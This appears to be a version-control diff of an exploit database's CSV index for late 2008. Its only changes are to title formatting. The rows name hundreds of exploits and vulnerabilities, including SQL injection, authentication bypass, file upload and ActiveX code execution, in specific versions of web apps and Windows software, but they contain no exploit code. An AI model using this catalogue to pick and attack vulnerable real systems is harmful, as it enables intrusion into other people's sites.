Vulnerabilities",2008-09-10,r45c4l,php,webapps,0 6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free (page) SQL Injection Vulnerability",2008-09-10,Cru3l.b0y,php,webapps,0 -6424,platforms/windows/dos/6424.html,"Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit",2008-09-11,"Jeremy Brown",windows,dos,0 +6424,platforms/windows/dos/6424.html,"Adobe Acrobat 9 - ActiveX Remote Denial of Service Exploit",2008-09-11,"Jeremy Brown",windows,dos,0 6425,platforms/php/webapps/6425.txt,"PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities",2008-09-11,IRCRASH,php,webapps,0 6426,platforms/php/webapps/6426.txt,"Autodealers CMS AutOnline (pageid) SQL Injection Vulnerability",2008-09-11,r45c4l,php,webapps,0 6427,platforms/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 (p) Local File Inclusion Vulnerability",2008-09-11,StAkeR,php,webapps,0 @@ -6011,7 +6011,7 @@ id,file,description,date,author,platform,type,port 6434,platforms/windows/dos/6434.html,"Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC",2008-09-11,LiquidWorm,windows,dos,0 6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 (id) SQL Injection Vulnerabilities",2008-09-11,"Virangar Security",php,webapps,0 6436,platforms/php/webapps/6436.txt,"PhpWebGallery 1.3.4 (cat) Blind SQL Injection Vulnerability",2008-09-11,Stack,php,webapps,0 -6437,platforms/php/webapps/6437.txt,"Easy Photo Gallery 2.1 Arbitrary Add Admin / remove user Vulnerability",2008-09-11,Stack,php,webapps,0 +6437,platforms/php/webapps/6437.txt,"Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user Vulnerability",2008-09-11,Stack,php,webapps,0 6438,platforms/php/webapps/6438.pl,"Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit",2008-09-11,Tec-n0x,php,webapps,0 6439,platforms/php/webapps/6439.txt,"Sports Clubs Web Panel 0.0.1 - Remote File Upload Vulnerability",2008-09-12,Stack,php,webapps,0 6440,platforms/php/webapps/6440.pl,"PhpWebGallery 1.3.4 - Remote Blind SQL Injection Exploit",2008-09-12,ka0x,php,webapps,0 @@ -6029,7 +6029,7 @@ id,file,description,date,author,platform,type,port 6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b (oyun) Remote SQL Injection Vulnerability",2008-09-13,Crackers_Child,asp,webapps,0 6454,platforms/windows/remote/6454.html,"Windows Media Encoder XP SP2 - wmex.dll ActiveX BoF Exploit (MS08-053)",2008-09-13,haluznik,windows,remote,0 6455,platforms/php/webapps/6455.txt,"Linkarity (link.php) Remote SQL Injection Vulnerability",2008-09-13,"Egypt Coder",php,webapps,0 -6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 Arbitrary Database Backup Vulnerability",2008-09-13,SirGod,php,webapps,0 +6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup Vulnerability",2008-09-13,SirGod,php,webapps,0 6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability",2008-09-14,Stack,php,webapps,0 6458,platforms/windows/dos/6458.c,"The Personal FTP Server 6.0f RETR Denial of Service Exploit",2008-09-14,Shinnok,windows,dos,0 6459,platforms/hardware/dos/6459.txt,"Nokia e90/n82 (s60v3) - Remote Denial of Service Vulnerability",2008-09-14,wins.mallow,hardware,dos,0 @@ -6062,7 +6062,7 @@ id,file,description,date,author,platform,type,port 6488,platforms/php/webapps/6488.txt,"Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability",2008-09-18,SarBoT511,php,webapps,0 6489,platforms/php/webapps/6489.txt,"ProActive CMS (template) Local File Inclusion Vulnerability",2008-09-18,r45c4l,php,webapps,0 6490,platforms/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation Attack",2008-09-18,"Neo Anderson",php,webapps,0 -6491,platforms/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK Activex (NMSDVDX.dll) Exploit",2008-09-19,Nine:Situations:Group,windows,remote,0 +6491,platforms/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK ActiveX (NMSDVDX.dll) Exploit",2008-09-19,Nine:Situations:Group,windows,remote,0 6492,platforms/php/webapps/6492.php,"Pluck 4.5.3 (update.php) Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0 6493,platforms/linux/dos/6493.pl,"fhttpd 0.4.2 un64() - Remote Denial of Service Exploit",2008-09-19,"Jeremy Brown",linux,dos,0 6494,platforms/php/webapps/6494.txt,"easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability",2008-09-19,"Egypt Coder",php,webapps,0 @@ -6084,7 +6084,7 @@ id,file,description,date,author,platform,type,port 6510,platforms/php/webapps/6510.txt,"PHPKB 1.5 Professional Multiple Remote SQL Injection Vulnerabilities",2008-09-21,d3v1l,php,webapps,0 6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 (singerid) Remote SQL Injection Vulnerability",2008-09-21,"Hussin X",php,webapps,0 6512,platforms/php/webapps/6512.txt,"Diesel Job Site (job_id) Blind SQL Injection Vulnerability",2008-09-21,Stack,php,webapps,0 -6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability",2008-09-21,"CWH Underground",php,webapps,0 +6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add-Admin Vulnerability",2008-09-21,"CWH Underground",php,webapps,0 6514,platforms/php/webapps/6514.txt,"Availscript Jobs Portal Script File Upload Vulnerability (auth)",2008-09-21,InjEctOr5,php,webapps,0 6515,platforms/windows/dos/6515.c,"DESlock+ 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit",2008-09-21,"NT Internals",windows,dos,0 6516,platforms/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 (image) SQL Injection Vulnerability",2008-09-21,boom3rang,php,webapps,0 @@ -6164,7 +6164,7 @@ id,file,description,date,author,platform,type,port 6591,platforms/php/webapps/6591.txt,"RPG.Board <= 0.0.8Beta2 Insecure Cookie Handling Vulnerability",2008-09-27,Stack,php,webapps,0 6592,platforms/php/webapps/6592.txt,"X7 Chat <= 2.0.1A1 (mini.php help_file) Local File Inclusion Vulnerability",2008-09-27,NoGe,php,webapps,0 6593,platforms/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - Remote SQL Injection Vulnerability",2008-09-27,elusiven,php,webapps,0 -6594,platforms/php/webapps/6594.txt,"Camera Life 2.6.2b4 Arbitrary File Upload Vulnerability",2008-09-27,Mi4night,php,webapps,0 +6594,platforms/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload Vulnerability",2008-09-27,Mi4night,php,webapps,0 6595,platforms/php/webapps/6595.txt,"Joovili <= 3.0 - Multiple SQL Injection Vulnerabilities",2008-09-27,~!Dok_tOR!~,php,webapps,0 6596,platforms/php/webapps/6596.txt,"E-Uploader Pro <= 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-09-27,~!Dok_tOR!~,php,webapps,0 6598,platforms/php/webapps/6598.txt,"CoAST 0.95 (sections_file) Remote File Inclusion Vulnerability",2008-09-27,DaRkLiFe,php,webapps,0 @@ -6241,7 +6241,7 @@ id,file,description,date,author,platform,type,port 6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista Access Violation from Limited Account Exploit (BSoD)",2008-10-04,Defsanguje,windows,dos,0 6672,platforms/windows/dos/6672.txt,"AyeView 2.20 (invalid bitmap header parsing) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 (malformed bmp image) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 -6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit",2008-10-05,JosS,php,webapps,0 +6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public <= 1.0 - Arbitrary Upload / Information c99 Expoit",2008-10-05,JosS,php,webapps,0 6675,platforms/php/webapps/6675.pl,"Galerie 3.2 (pic) WBB Lite Addon Blind SQL Injection Exploit",2008-10-05,J0hn.X3r,php,webapps,0 6676,platforms/php/webapps/6676.txt,"opennms < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0 6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 (leggi.php id) Remote SQL Injection Exploit",2008-10-05,Piker,php,webapps,0 @@ -6326,7 +6326,7 @@ id,file,description,date,author,platform,type,port 6758,platforms/php/webapps/6758.txt,"AstroSPACES (id) Remote SQL Injection Vulnerability",2008-10-15,TurkishWarriorr,php,webapps,0 6759,platforms/php/webapps/6759.txt,"mystats (hits.php) Multiple Vulnerabilities Exploit",2008-10-15,JosS,php,webapps,0 6760,platforms/php/webapps/6760.txt,"myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability",2008-10-15,JosS,php,webapps,0 -6761,platforms/windows/dos/6761.html,"Hummingbird <= 13.0 ActiveX Remote Buffer Overflow PoC",2008-10-16,"Thomas Pollet",windows,dos,0 +6761,platforms/windows/dos/6761.html,"Hummingbird <= 13.0 - ActiveX Remote Buffer Overflow PoC",2008-10-16,"Thomas Pollet",windows,dos,0 6762,platforms/php/webapps/6762.txt,"CafeEngine Multiple Remote SQL Injection Vulnerabilities",2008-10-16,0xFFFFFF,php,webapps,0 6763,platforms/php/webapps/6763.txt,"Mosaic Commerce (category.php cid) SQL Injection Vulnerability",2008-10-16,"Ali Abbasi",php,webapps,0 6764,platforms/php/webapps/6764.php,"Mic_blog 0.0.3 (SQL Injection/Privilege Escalation) Remote Exploit",2008-10-16,StAkeR,php,webapps,0 @@ -6338,10 +6338,10 @@ id,file,description,date,author,platform,type,port 6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 (file) File Disclosure Vulnerability",2008-10-16,LMaster,php,webapps,0 6771,platforms/cgi/webapps/6771.txt,"Calendars for the Web 4.02 Admin Auth Bypass Vulnerability",2008-10-16,SecVuln,cgi,webapps,0 6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 (index.php md) Local File Inclusion Vulnerability",2008-10-16,ZeN,php,webapps,0 -6773,platforms/windows/remote/6773.html,"Hummingbird Deployment Wizard 2008 ActiveX Command Execution",2008-10-17,shinnai,windows,remote,0 +6773,platforms/windows/remote/6773.html,"Hummingbird Deployment Wizard 2008 - ActiveX Command Execution",2008-10-17,shinnai,windows,remote,0 6774,platforms/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 Registry Values Creation/Change",2008-10-17,shinnai,windows,remote,0 6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS Exploit",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0 -6776,platforms/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 ActiveX File Execution(2)",2008-10-17,shinnai,windows,remote,0 +6776,platforms/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)",2008-10-17,shinnai,windows,remote,0 6777,platforms/php/webapps/6777.txt,"Wordpress Plugin st_newsletter (stnl_iframe.php) SQL Injection Vuln",2008-10-17,r45c4l,php,webapps,0 6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri (kategorino) Remote SQL Injection Exploit",2008-10-18,EcHoLL,php,webapps,0 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability",2008-10-18,Qabandi,php,webapps,0 @@ -6383,7 +6383,7 @@ id,file,description,date,author,platform,type,port 6817,platforms/php/webapps/6817.txt,"Joomla Component RWCards 3.0.11 - Local File Inclusion Vulnerability",2008-10-23,Vrs-hCk,php,webapps,0 6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilies",2008-10-23,JosS,php,webapps,0 6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 (index.php id) SQL Injection Vulnerability",2008-10-23,"CWH Underground",php,webapps,0 -6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 Arbitrary Add Admin Exploit",2008-10-23,"CWH Underground",php,webapps,0 +6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin Exploit",2008-10-23,"CWH Underground",php,webapps,0 6821,platforms/php/webapps/6821.txt,"miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities",2008-10-23,StAkeR,php,webapps,0 6822,platforms/php/webapps/6822.txt,"websvn <= 2.0 (xss/fh/ce) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0 6823,platforms/php/webapps/6823.txt,"siteengine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0 @@ -6393,7 +6393,7 @@ id,file,description,date,author,platform,type,port 6827,platforms/php/webapps/6827.txt,"Joomla Component Kbase 1.0 - Remote SQL Injection Vulnerability",2008-10-24,H!tm@N,php,webapps,0 6828,platforms/windows/remote/6828.html,"db Software Laboratory VImpX (VImpX.ocx) Multiple Vulnerabilities",2008-10-24,shinnai,windows,remote,0 6829,platforms/php/webapps/6829.txt,"Aj RSS Reader (EditUrl.php url) SQL Injection Vulnerability",2008-10-24,yassine_enp,php,webapps,0 -6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 Arbitrary Shell Upload Vulnerability",2008-10-24,Dentrasi,php,webapps,0 +6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary Shell Upload Vulnerability",2008-10-24,Dentrasi,php,webapps,0 6831,platforms/windows/local/6831.cpp,"TUGzip 3.00 archiver - (.zip) Local Buffer Overflow Exploit",2008-10-24,"fl0 fl0w",windows,local,0 6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 Virgo Remote Format String Exploit PoC",2008-10-24,LiquidWorm,windows,dos,0 6833,platforms/php/webapps/6833.txt,"phpdaily (sql/xss/lfd) Multiple Vulnerabilities",2008-10-24,0xFFFFFF,php,webapps,0 @@ -6418,7 +6418,7 @@ id,file,description,date,author,platform,type,port 6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit",2008-10-27,StAkeR,php,webapps,0 6853,platforms/php/webapps/6853.txt,"questcms (xss/directory traversal/SQL) Multiple Vulnerabilities",2008-10-27,d3b4g,php,webapps,0 6854,platforms/php/webapps/6854.txt,"Aiocp 1.4 (poll_id) Remote SQL Injection Vulnerability",2008-10-27,ExSploiters,php,webapps,0 -6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 Arbitrary Database Backup Vulnerability",2008-10-27,Stack,php,webapps,0 +6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup Vulnerability",2008-10-27,Stack,php,webapps,0 6856,platforms/php/webapps/6856.txt,"e107 Plugin BLOG Engine 2.1.4 - Remote SQL Injection Vulnerability",2008-10-28,ZoRLu,php,webapps,0 6857,platforms/php/webapps/6857.txt,"MyForum 1.3 Insecure Cookie Handling Vulnerability",2008-10-28,Stack,php,webapps,0 6858,platforms/php/webapps/6858.txt,"PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability",2008-10-28,"Hussin X",php,webapps,0 @@ -6435,8 +6435,8 @@ id,file,description,date,author,platform,type,port 6869,platforms/php/webapps/6869.txt,"WebCards <= 1.3 - Remote SQL Injection Vulnerability",2008-10-29,t0pP8uZz,php,webapps,0 6870,platforms/windows/remote/6870.html,"MW6 Aztec ActiveX (Aztec.dll) Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6871,platforms/windows/remote/6871.html,"MW6 Barcode ActiveX (Barcode.dll) Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 -6872,platforms/windows/remote/6872.html,"MW6 DataMatrix ActiveX (DataMatrix.dll) Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 -6873,platforms/windows/remote/6873.html,"MW6 PDF417 ActiveX (MW6PDF417.dll) Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 +6872,platforms/windows/remote/6872.html,"MW6 DataMatrix - ActiveX (DataMatrix.dll) Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 +6873,platforms/windows/remote/6873.html,"MW6 PDF417 - ActiveX (MW6PDF417.dll) Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6874,platforms/php/webapps/6874.txt,"Harlandscripts Pro Traffic One (mypage.php) SQL Injection Vulnerability",2008-10-29,"Beenu Arora",php,webapps,0 6875,platforms/windows/remote/6875.html,"Visagesoft eXPert PDF ViewerX (VSPDFViewerX.ocx) File Overwrite",2008-10-29,"Marco Torti",windows,remote,0 6876,platforms/php/webapps/6876.txt,"Venalsur on-line Booking Centre (OfertaID) XSS/SQL Injection Vulns",2008-10-29,d3b4g,php,webapps,0 @@ -6524,7 +6524,7 @@ id,file,description,date,author,platform,type,port 6960,platforms/php/webapps/6960.txt,"1st News (products.php id) Remote SQL Injection Vulnerability",2008-11-02,TR-ShaRk,php,webapps,0 6961,platforms/php/webapps/6961.pl,"deV!Lz Clanportal [DZCP] <= 1.4.9.6 - Blind SQL Injection Exploit",2008-11-02,N/A,php,webapps,0 6962,platforms/php/webapps/6962.txt,"BosDev BosClassifieds (cat_id) SQL Injection Vulnerability",2008-11-03,ZoRLu,php,webapps,0 -6963,platforms/windows/remote/6963.html,"Chilkat Crypt Activex Arbitrary File Creation/Execution PoC",2008-11-03,shinnai,windows,remote,0 +6963,platforms/windows/remote/6963.html,"Chilkat Crypt - ActiveX Arbitrary File Creation/Execution PoC",2008-11-03,shinnai,windows,remote,0 6964,platforms/php/webapps/6964.txt,"Acc Real Estate 4.0 Insecure Cookie Handling Vulnerability",2008-11-03,Hakxer,php,webapps,0 6965,platforms/php/webapps/6965.txt,"Acc Statistics 1.1Insecure Cookie Handling Vulnerability",2008-11-03,Hakxer,php,webapps,0 6966,platforms/php/webapps/6966.txt,"Acc PHP eMail 1.1 Insecure Cookie Handling Vulnerability",2008-11-03,Hakxer,php,webapps,0 @@ -6592,9 +6592,9 @@ id,file,description,date,author,platform,type,port 7029,platforms/php/webapps/7029.txt,"turnkeyforms Business Survey Pro 1.0 (id) SQL Injection Vuln",2008-11-07,G4N0K,php,webapps,0 7030,platforms/php/webapps/7030.txt,"Mole Group Pizza (manufacturers_id) Script SQL Injection Vuln",2008-11-07,InjEctOr5,php,webapps,0 7031,platforms/php/webapps/7031.php,"e-Vision CMS <= 2.0.2 - Multiple Local File Inclusion Exploit",2008-11-07,StAkeR,php,webapps,0 -7032,platforms/php/webapps/7032.txt,"U&M Software Signup 1.1 Auth Bypass Vulnerability",2008-11-07,G4N0K,php,webapps,0 -7033,platforms/php/webapps/7033.txt,"U&M Software JustBookIt 1.0 Auth Bypass Vulnerability",2008-11-07,G4N0K,php,webapps,0 -7034,platforms/php/webapps/7034.txt,"U&M Software Event Lister 1.0 Auth Bypass Vulnerability",2008-11-07,G4N0K,php,webapps,0 +7032,platforms/php/webapps/7032.txt,"U&M Software Signup 1.1 - Auth Bypass Vulnerability",2008-11-07,G4N0K,php,webapps,0 +7033,platforms/php/webapps/7033.txt,"U&M Software JustBookIt 1.0 - Auth Bypass Vulnerability",2008-11-07,G4N0K,php,webapps,0 +7034,platforms/php/webapps/7034.txt,"U&M Software Event Lister 1.0 - Auth Bypass Vulnerability",2008-11-07,G4N0K,php,webapps,0 7035,platforms/php/webapps/7035.txt,"turnkeyforms Local Classifieds (XSS/SQL) Multiple Vulnerabilities",2008-11-07,TR-ShaRk,php,webapps,0 7038,platforms/php/webapps/7038.txt,"Joomla Component Clickheat 1.0.1 - Multiple RFI Vulnerabilities",2008-11-07,NoGe,php,webapps,0 7039,platforms/php/webapps/7039.txt,"Joomla Component Recly!Competitions 1.0.0 - Multiple RFI Vulnerabilities",2008-11-07,NoGe,php,webapps,0 @@ -6613,7 +6613,7 @@ id,file,description,date,author,platform,type,port 7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 (id) Remote SQL Injection Vulnerability",2008-11-07,TR-ShaRk,php,webapps,0 7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - (Parent) SQL Injection Vulnerability",2008-11-07,G4N0K,php,webapps,0 7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 (AKEProtect.sys) Privilege Escalation Exploit",2008-11-07,"NT Internals",windows,local,0 -7055,platforms/hardware/remote/7055.txt,"SpeedStream 5200 Authentication Bypass Config Download Vulnerability",2008-11-07,hkm,hardware,remote,0 +7055,platforms/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Config Download Vulnerability",2008-11-07,hkm,hardware,remote,0 7056,platforms/windows/remote/7056.rb,"GE Proficy Real Time Information Portal Credentials Leak Sniffer (meta)",2008-11-08,"Kevin Finisterre",windows,remote,0 7057,platforms/php/webapps/7057.pl,"MemHT Portal <= 4.0 - Remote Code Execution Exploit",2008-11-08,Ams,php,webapps,0 7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 (upload/XSS) Multiple Vulnerabilities",2008-11-08,ZoRLu,php,webapps,0 @@ -6624,11 +6624,11 @@ id,file,description,date,author,platform,type,port 7063,platforms/php/webapps/7063.txt,"V3 Chat - Profiles/Dating Script 3.0.2 - Insecure Cookie Handling Vuln",2008-11-08,Stack,php,webapps,0 7064,platforms/php/webapps/7064.pl,"Mambo Component n-form (form_id) Blind SQL Injection Exploit",2008-11-08,boom3rang,php,webapps,0 7065,platforms/php/webapps/7065.txt,"Cyberfolio <= 7.12.2 (css.php theme) Local File Inclusion Vulnerability",2008-11-08,dun,php,webapps,0 -7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 Auth Bypass Vulnerability",2008-11-08,G4N0K,php,webapps,0 +7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Auth Bypass Vulnerability",2008-11-08,G4N0K,php,webapps,0 7067,platforms/asp/webapps/7067.txt,"DigiAffiliate <= 1.4 (Auth Bypass) SQL Injection Vulnerability",2008-11-08,d3b4g,asp,webapps,0 7068,platforms/php/webapps/7068.txt,"Mole Group Airline Ticket Script (Auth Bypass) SQL Injection Vuln",2008-11-08,Cyber-Zone,php,webapps,0 7069,platforms/php/webapps/7069.txt,"V3 Chat Live Support 3.0.4 - Insecure Cookie Handling Vulnerability",2008-11-08,Cyber-Zone,php,webapps,0 -7070,platforms/php/webapps/7070.txt,"Zeeways PHOTOVIDEOTUBE 1.1 Auth Bypass Vulnerability",2008-11-08,Stack,php,webapps,0 +7070,platforms/php/webapps/7070.txt,"Zeeways PHOTOVIDEOTUBE 1.1 - Auth Bypass Vulnerability",2008-11-08,Stack,php,webapps,0 7071,platforms/php/webapps/7071.txt,"ExoPHPDesk 1.2 Final (Auth Bypass) SQL Injection Vulnerability",2008-11-09,Cyber-Zone,php,webapps,0 7072,platforms/php/webapps/7072.txt,"ZEEMATRI 3.0 (bannerclick.php adid) SQL Injection Vulnerability",2008-11-09,"Hussin X",php,webapps,0 7074,platforms/php/webapps/7074.txt,"X10media Mp3 - Search Engine <= 1.6 - Remote File Disclosure Vulnerability",2008-11-09,THUNDER,php,webapps,0 @@ -6681,7 +6681,7 @@ id,file,description,date,author,platform,type,port 7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 (Auth Bypass) SQL Injection Vulnerability",2008-11-14,ZoRLu,php,webapps,0 7124,platforms/php/webapps/7124.txt,"turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability",2008-11-14,ZoRLu,php,webapps,0 7125,platforms/windows/remote/7125.txt,"SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068)",2008-11-14,"Andres Tarasco",windows,remote,0 -7126,platforms/windows/dos/7126.html,"VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow PoC",2008-11-15,r0ut3r,windows,dos,0 +7126,platforms/windows/dos/7126.html,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow PoC",2008-11-15,r0ut3r,windows,dos,0 7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 (chid) SQL Injection Vulnerability",2008-11-15,snakespc,php,webapps,0 7129,platforms/multiple/local/7129.sh,"Sudo <= 1.6.9p18 - (Defaults setenv) Local Privilege Escalation Exploit",2008-11-15,kingcope,multiple,local,0 7130,platforms/php/webapps/7130.php,"Minigal b13 (index.php list) Remote File Disclosure Exploit",2008-11-15,"Alfons Luja",php,webapps,0 @@ -6695,7 +6695,7 @@ id,file,description,date,author,platform,type,port 7138,platforms/php/webapps/7138.txt,"E-topbiz AdManager 4 (group) Blind SQL Injection Vulnerability",2008-11-17,"Hussin X",php,webapps,0 7140,platforms/php/webapps/7140.txt,"FREEze Greetings 1.0 - Remote Password Retrieve Exploit",2008-11-17,cOndemned,php,webapps,0 7141,platforms/asp/webapps/7141.txt,"Q-Shop 3.0 - Remote XSS/SQL Injection Vulnerabilities",2008-11-17,Bl@ckbe@rD,asp,webapps,0 -7142,platforms/windows/remote/7142.html,"Chilkat Socket activex 2.3.1.1 - Remote Arbitrary File Creation Exploit",2008-11-17,Zigma,windows,remote,0 +7142,platforms/windows/remote/7142.html,"Chilkat Socket ActiveX 2.3.1.1 - Remote Arbitrary File Creation Exploit",2008-11-17,Zigma,windows,remote,0 7143,platforms/php/webapps/7143.txt,"phpfan 3.3.4 (init.php includepath) Remote File Inclusion Vulnerability",2008-11-17,ahmadbady,php,webapps,0 7144,platforms/php/webapps/7144.txt,"Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability",2008-11-17,ZoRLu,php,webapps,0 7145,platforms/windows/remote/7145.txt,"Exodus 0.10 (uri handler) Arbitrary Parameter Injection Vulnerability",2008-11-17,Nine:Situations:Group,windows,remote,0 @@ -6755,7 +6755,7 @@ id,file,description,date,author,platform,type,port 7207,platforms/windows/dos/7207.pl,"Nero ShowTime 5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC",2008-11-24,LiquidWorm,windows,dos,0 7208,platforms/php/webapps/7208.txt,"NetArtMedia Real Estate Portal 1.2 (ad_id) SQL Injection Vuln",2008-11-24,"Hussin X",php,webapps,0 7209,platforms/windows/dos/7209.pl,"W3C Amaya 10.1 Web Browser (URL Bar) Remote Stack Overflow PoC",2008-11-24,r0ut3r,windows,dos,0 -7210,platforms/php/webapps/7210.txt,"Goople CMS 1.7 Arbitrary Code Execution Vulnerability",2008-11-24,x0r,php,webapps,0 +7210,platforms/php/webapps/7210.txt,"Goople CMS 1.7 - Arbitrary Code Execution Vulnerability",2008-11-24,x0r,php,webapps,0 7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection Exploit",2008-11-24,G4N0K,php,webapps,0 7212,platforms/php/webapps/7212.php,"VideoScript 3.0 <= 4.1.5.55 - Unofficial Shell Injection Exploit",2008-11-24,G4N0K,php,webapps,0 7213,platforms/windows/dos/7213.pl,"W3C Amaya 10.1 Web Browser (id) Remote Stack Overflow PoC",2008-11-24,r0ut3r,windows,dos,0 @@ -7045,11 +7045,11 @@ id,file,description,date,author,platform,type,port 7502,platforms/php/webapps/7502.txt,"r.cms 2.0 - Multiple SQL Injection Vulnerabilities",2008-12-17,Lidloses_Auge,php,webapps,0 7503,platforms/multiple/local/7503.txt,"PHP python extension safe_mode Bypass Local Vulnerability",2008-12-17,"Amir Salmani",multiple,local,0 7504,platforms/php/webapps/7504.txt,"Joomla Component Tech Article 1.x - (item) SQL Injection Vulnerability",2008-12-17,InjEctOr5,php,webapps,0 -7505,platforms/windows/remote/7505.html,"Phoenician Casino FlashAX ActiveX Remote Code Execution Exploit",2008-12-17,e.wiZz!,windows,remote,0 +7505,platforms/windows/remote/7505.html,"Phoenician Casino FlashAX - ActiveX Remote Code Execution Exploit",2008-12-17,e.wiZz!,windows,remote,0 7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - (index.php menuID) Remote SQL Injection Vulnerability",2008-12-17,AnGeL25dZ,php,webapps,0 7507,platforms/php/webapps/7507.pl,"Lizardware CMS <= 0.6.0 - Blind SQL Injection Exploit",2008-12-17,StAkeR,php,webapps,0 7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS (QuickerSite.mdb) Database Disclosure Vulnerability",2008-12-17,AlpHaNiX,asp,webapps,0 -7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x Arbitrary PHP File Upload Vulnerability",2008-12-18,Pouya_Server,php,webapps,0 +7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary PHP File Upload Vulnerability",2008-12-18,Pouya_Server,php,webapps,0 7510,platforms/php/webapps/7510.txt,"2532/gigs 1.2.2 - stable Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0 7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 - Stable Remote Login Bypass Vulnerability",2008-12-18,StAkeR,php,webapps,0 7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 - Stable Remote Command Execution Exploit",2008-12-18,StAkeR,php,webapps,0 @@ -7132,7 +7132,7 @@ id,file,description,date,author,platform,type,port 7592,platforms/windows/dos/7592.pl,"Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow PoC",2008-12-28,"Encrypt3d.M!nd ",windows,dos,0 7593,platforms/php/webapps/7593.pl,"DeluxeBB <= 1.2 - Remote Blind SQL Injection Exploit",2008-12-28,StAkeR,php,webapps,0 7594,platforms/windows/remote/7594.html,"Chilkat FTP ActiveX 